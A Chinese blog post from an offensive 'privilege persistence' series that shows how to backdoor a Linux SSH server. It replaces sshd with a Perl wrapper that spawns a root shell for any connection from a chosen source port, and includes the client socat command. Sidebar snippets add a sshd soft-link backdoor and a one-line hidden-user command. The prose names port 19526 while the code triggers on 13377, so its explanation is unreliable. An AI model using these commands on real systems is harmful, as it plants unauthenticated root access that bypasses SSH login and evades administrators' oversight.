操作系统权限维持(十一)之Linux系统-SSH Wrapper后门

最新推荐文章于 2024-06-17 16:58:00 发布
最新推荐文章于 2024-06-17 16:58:00 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: 操作系统权限维持 文章标签: linux ssh 服务器 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129795498
版权
该系列文章详细阐述了在Windows和Linux系统中如何维持操作系统权限,包括使用粘贴键、克隆账号、启动项、计划任务、系统服务等方法建立后门。在SSHWrapper后门的例子中,文章解释了如何通过修改sshd程序,创建一个隐蔽的入口,当特定端口连接时,提供shell访问。实验环境中,服务端通过备份sshd并创建perl脚本来实现这一机制,而客户端利用socat工具进行连接测试。
摘要由CSDN通过智能技术生成
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门
操作系统权限维持(十)之Linux系统-SSH 软连接后门

SSH Wrapper后门

首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。原始的sshd监听端口建立了tcp连接后,会fork一个子进程处理具体工作。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到脚本了。此时子进程标准输入输出已被重定向到套接字,getpeername能真的获取到客户端的TCP源端口,如果是19526就执行sh给个shell.

简单点就是从sshd fork出一个子进程,输入输出重定向到套接字,并对连过来的客户端端口进行了判断

实验环境

机器名IP位置
kali192.168.52.130客户端
kali-2192.168.52.132服务端

服务端执行:

cd /usr/sbin/
mv sshd ../bin/    #对sshd程序做备份
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/ssh restart

在这里插入图片描述

客户端执行:

socat STDIO TCP4:192.168.52.132:22,sourceport=13377

在这里插入图片描述

怰月
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ssh远程登录协议和tcp wappers
weixin_73462212的博客
10-22 959
ssh远程登录协议和tcp wappers
SSH和TCP wrappers
.銀河狙擊手的博客
12-09 395
目录 一. SSH 远程管理 ①配置Open SSH 服务端 ②sshd 支持的登陆验证方式 ③使用 SSH 客户端程序 二.密钥对验证的 SSH 体系 ①配置密钥对验证的步骤 三.TCP Wrapper 访问控制 ①TCP Wrapper 概述 ②TCP Wrapper 保护机制 ③TCP Wrapper 配置格式 ⑤TCP Wrapper 配置步骤 四. YUM ①YUM 概述 ② 准备安装源 五.YUM工具概述 六.YUM常用命令大全 一. SSH 远程管理 ..
Linux后渗透--权限维持十式(附检测及清除手段)
weixin_44155363的博客
06-15 2439
0x01:SSH 一、ssh软连接 SSH软连接后门的原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su) 3、如果被控主机不允许root登陆可用其他已存在用户登陆 4、通过软连接的方式,实质上PAM认证是通过软连接的文件名(如:/tmp/su,/home/su)在/etc/pam.d/目录下寻找对应的PAM配置文件(如:/etc/pam.d/su) 5、任意密码登
LinuxSSH远程服务和tcpwrapper访问控制工具详细介绍
一个认真学习的女孩子的博客
08-30 348
TCPwrappers先查找/etc/hosts.allow,再查找/etc/hosts.deny,如果两个配置中有冲突,先匹配中的优先,也就是hosts.allow中的配置优先,如果两个配置都没命中,默认放行。如果 /etc/hosts.allow 没有匹配项,则检查/etc/hosts.deny;/etc/hosts.allow、/etc/hosts.deny两个配置文件,并判断某一主机是否能够访问服务。先检查 /etc/hosts.allow 如果被允许,则直接放行;sshd服务的端口号----
SSH配置、跨主机上传下载、Wrapper访问控制实验操作步骤
最新发布
变成我......
06-17 1086
详细列出终端、SSH协议的概念;SSH配置文件相关操作步骤;跨主机上传下载实验步骤;Wrapper访问控制操作步骤和概念
ssh的 TCP_Wrapper和PAM安全模块----->配置,ulimit命令
weixin_45697293的博客
02-02 622
一. TCP_Wrappers介绍 前提得支持libwrap.so库,不然没用 作者:Wieste Venema,IBM,Google 工作在第四层(传输层)的TCP协议 对有状态连接的特定服务进行安全检测并实现访问控制 以库文件形式实现 某进程是否接受libwrap的控制取决于发起此进程的程序在编译时是否针对libwrap进行编译的 判断服务程序是否能够由tcp_wrapper进行访问控制的方法: 查看软件是否支持TCP_wrappers ldd /PATH/TO/PROGRAM|grep libwrap
远程访问及控制
m0_70627741的博客
06-17 1098
此时回到102客户端主机使用ssh 192.168.10.101 登录101主机,如果刚才设置了私钥文件的密码就需要输入刚才设置的密码,如果没设置,就实现了免密登录。ssh是一个安全机制,是受到内核保护的,一旦该服务的核心参数(端口号)被修改,内核安全机制就会生效,不允许重启sshd服务。公钥验证是SSH服务器用来验证用户身份的一种方法,通过比对用户提供的公钥和服务器上已注册的公钥信息来确认用户的身份。密钥文件存放位置:用哪个用户登录就放到哪个用户的家目录,这里用的是root登录,使用默认路径,直接回车。
wrapper-linux-x86-64-3.5.55 社区版
02-21
首先,"wrapper-linux-x86-64-3.5.55"这个版本表明它是专为64位Linux操作系统设计的,兼容x86_64架构。这里的“3.5.55”代表了Wrapper软件的版本号,通常,新版本会包含性能优化、错误修复和新功能。 Wrapper技术的...
wrapper-linux-x86-64-3.5.55 专业版
02-21
"Wrapper-linux-x86-64-3.5.55 专业版"是一个专为Linux平台设计的x86_64架构的Java服务包装器。它主要用于将Java应用程序封装为可独立运行的系统服务,使其能够在系统启动时自动启动,并在运行时提供必要的管理和...
wrapper-linux-x86-64-3.5.55 标准版
02-21
"WRAPPER-LINUX-X86-64-3.5.55 标准版"是一个专为Linux系统设计的x86_64架构的Java包装器(Wrapper),主要用于管理和控制Java应用程序在Linux环境下的运行。这个包装器扮演着一个中间层的角色,允许Java应用程序以...
react-native-charts-wrapper图表库页面布局使用案例
12-15
在React Native开发中,我们经常会遇到需要展示数据图表的需求,这时`react-native-charts-wrapper`库就显得尤为重要。这个库是专门为React Native设计的一个图表组件,支持多种图表类型,如线图、柱状图、饼图等,...
基于linux操作系统网络服务器安全管理.pdf
09-06
【基于Linux操作系统网络服务器安全管理】是针对网络服务器Linux环境下如何确保系统安全的重要主题。Linux作为一款优秀的网络操作系统,由于其开源、免费、稳定、兼容性好以及强大的可定制性,广泛应用于服务器...
【内网安全】——Linux权限维持
Demo不是emo的博客
02-26 4564
Linux常见的权限维持姿势
应急响应之Linux权限维持--后门
明哥哥知识分享
01-14 781
本文将对Linux下常见的权限维持技术进行解析,知己知彼百战不殆。 1、一句话添加用户和密码 添加普通用户: # 创建一个用户名guest,密码123456的普通用户 useradd -p `openssl passwd -1 -salt 'salt' 123456` guest # useradd -p 方法 ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句 useradd -p "$(openssl passwd -1 123456)" guest # chpasswd方法
【安全研究】Linux后渗透常见后门驻留方式分析
weixin_49128886的博客
11-09 1423
Linux后渗透常见后门驻留方式分析
SSH与TCP Wrapper 学习笔记
weixin_34326179的博客
07-26 437
SSH(Secure Shell) 实现了与telent服务类似的远程登录功能,ssh协议在网络中使用密文传输数据,SSH服务器中还支持使用scp和sftp等客户端程序进行远程主机的文件复制 SSH协议提供两种用户认证方式: 基于口令的安全认证 与telnet类似,提供正确的用户口令后可以远程登录服务器 基于密钥的安全认证 使用公钥和私钥对的方式...
渗透linuxssh,Linux渗透技巧之SSH
weixin_42302384的博客
05-12 558
1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口肉鸡上执行mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。效果图:2. 做一个SSH wrapper后门,效果比第一个好,...
Linux网络服务之SSH远程控制与TCP Wrappers访问控制
weixin_47062656的博客
12-08 409
SSH远程管理 SSH服务器 SSH(Secure Shell)是一种安全通道协议,主要用来实现字符界面的远程登录、远程 复制等功能; SSH 协议对通信双方的数据传输进行了加密处理,其中包括用户登录时输入的用户口令; SSH 为建立在应用层和传输层基础上的安全协议。对数据进行压缩,加快传输速度。 SSH客户端<--------------网络---------------->SSH服务端 SSH优点 数据传输是加密的,可以防止信息泄漏 数据传输是压缩的,可以提高传输
渗透技巧之ssh
huyangg的专栏
09-21 808
原文地址:http://www.anquan.us/static/drops/tips-1951.html 1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口,然后连
mybatis-plus wrapper使用
06-28
### 回答1: Mybatis-plus wrapper 是 Mybatis-plus 中的一个功能类,它可以帮助用户在使用 Mybatis-plus 时更简单地编写 SQL 语句。使用方法是在需要使用的地方引入 Wrapper 类,然后使用其中的各种方法(如 eq、like 等)构造查询条件,最后将 Wrapper 传入 Mybatis-plus 的 select、update、delete 等方法中即可执行查询、更新、删除等操作。 例如: ``` Wrapper<User> wrapper = new QueryWrapper<>(); wrapper.eq("name", "Tom") .like("age", "1"); List<User> users = userMapper.selectList(wrapper); ``` 在这个例子中,我们使用了 Wrapper 的 eq 和 like 方法构造了一个查询条件,查询 name 字段等于 "Tom",age 字段包含 "1" 的用户列表。 ### 回答2: Mybatis-Plus是一款基于Mybatis的增强工具包,它简化了Mybatis的开发流程,提供了一些常用且方便的功能,其中一个比较重要的功能是WrapperWrapper是Mybatis-Plus提供的一个用于构建SQL条件的工具类,它可以帮助我们快速构建一些常用的查询条件,如:等于、不等于、大于等于、小于等于、模糊查询等等。 使用Wrapper可以方便我们在开发时灵活地构建复杂的查询条件,同时也能大幅减少构建SQL语句所需的代码量。 在使用Wrapper时,我们需要先使用Wrappers工具类中的方法获取一个Wrapper对象,然后根据具体需求使用Wrapper对象的各种方法来构建查询条件。以下是一些常用的方法: 1. eq:等于 如:Wrapper.eq("name", "张三"),表示查询名字为“张三”的记录。 2. ne:不等于 如:Wrapper.ne("age", 18),表示查询年龄不为18的记录。 3. gt:大于 如:Wrapper.gt("age", 18),表示查询年龄大于18的记录。 4. ge:大于等于 如:Wrapper.ge("age", 18),表示查询年龄大于等于18的记录。 5. lt:小于 如:Wrapper.lt("age", 20),表示查询年龄小于20的记录。 6. le:小于等于 如:Wrapper.le("age", 20),表示查询年龄小于等于20的记录。 7. like:模糊查询 如:Wrapper.like("name", "%张%"),表示查询名字中包含“张”的记录。 8. in:包含在某个数组或集合中 如:Wrapper.in("id", Arrays.asList(1,2,3)),表示查询ID为1、2、3中的记录。 9. and:多个条件同时成立 如:Wrapper.and(w -> w.eq("name", "张三").eq("age", 18)),表示查询名字为“张三”且年龄为18岁的记录。 10. or:多个条件成立之一 如:Wrapper.or(w -> w.eq("name", "张三").eq("name", "李四")),表示查询名字为“张三”或“李四”的记录。 以上是一些常用的Wrapper方法,通过组合使用这些方法,我们可以构建出非常灵活和复杂的查询条件。 总体来说,Mybatis-Plus的Wrapper功能非常强大,使用它能够极大地提高我们的开发效率和代码质量,我们应该在开发中充分利用它。 ### 回答3: Mybatis-Plus Wrapper是Mybatis-Plus框架中提供的一种强大的查询构建器,它可以帮助开发人员更轻松、更快速地构造复杂的SQL查询语句。 使用Wrapper主要有两个步骤: 第一步,创建Wrapper对象 使用Wrapper构造器,创建一个Wrapper对象。Wrapper对象是Mybatis-Plus中的一个查询构建器,它可以帮助我们更轻松、更快速地构造复杂的SQL查询语句。Wrapper包含多种类型的查询条件,在构造过程中使用它们,可以组合出各种复杂的查询条件。 第二步,使用Wrapper对象查询数据库 使用Mybatis-Plus的service的方法,如list()或者page()方法,将Wrapper对象作为参数传入,即可实现对数据库表的查询操作。 Wrapper对象的几种常用操作: 1、eq、ne、gt、ge、lt、le、between、notBetween、like 这些操作用于构造等于、不等于、大于、大于等于、小于、小于等于、在两个值之间、不在两个值之间、like等条件。 2、in、notIn、isNull、isNotNull 这些操作用于构造在某个值集合中、不在某个值集合中、为空、不为空等条件。 3、groupBy、having 这些操作用于构造分组、分组后的过滤等条件。 4、orderBy、orderByAsc、orderByDesc 这些操作用于构造排序、升序排序、降序排序等条件。 除此之外,Wrapper还支持链式调用,可以更加优雅地构造查询条件。 总的来说,Mybatis-Plus Wrapper是一个功能强大的查询构建器,可以帮助开发人员更轻松、更快速地构造复杂的SQL查询语句,并且支持链式调用,让代码更加简洁优雅。在工作中,我们经常使用Wrapper来构建查询条件,它是开发高效的利器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值